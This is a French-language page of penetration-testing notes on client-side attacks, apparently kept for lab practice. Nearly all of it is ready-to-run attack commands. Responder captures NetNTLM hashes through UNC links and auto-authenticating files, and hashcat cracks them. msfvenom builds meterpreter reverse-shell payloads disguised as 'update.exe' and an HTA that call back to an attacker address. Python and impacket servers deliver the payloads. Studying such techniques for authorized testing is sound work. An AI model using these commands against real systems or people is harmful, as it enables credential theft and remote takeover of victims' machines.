Whackermelon
notes / attaques-applications-web / attaques-cote-client

Attaques côté client

sommaire

Attaques côté client — principe

Faire exécuter un fichier par un utilisateur (quand aucun service n’est exploitable directement). Souvent : capture de hash NetNTLM ou document piégé.

Capture de hash NetNTLM (Responder)

sudo responder -I tun0
# forcer l'authentification SMB de la victime vers nous :
#   lien UNC \\10.10.14.5\share  dans un champ / doc / partage inscriptible
#   fichiers auto-auth : .url, .scf, .lnk, .library-ms, .searchConnector-ms
hashcat -m 5600 netntlmv2.txt rockyou.txt      # casser le hash capture

Documents & exécutables piégés (msfvenom)

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=443 -f exe -o update.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.5 LPORT=443 -f hta-psh -o e.hta
# macro VBA Office (Shell), .lnk PowerShell, HTA -> mshta http://.../e.hta

Livraison

python3 -m http.server 80
impacket-smbserver share . -smb2support        # partage SMB pour Responder / delivery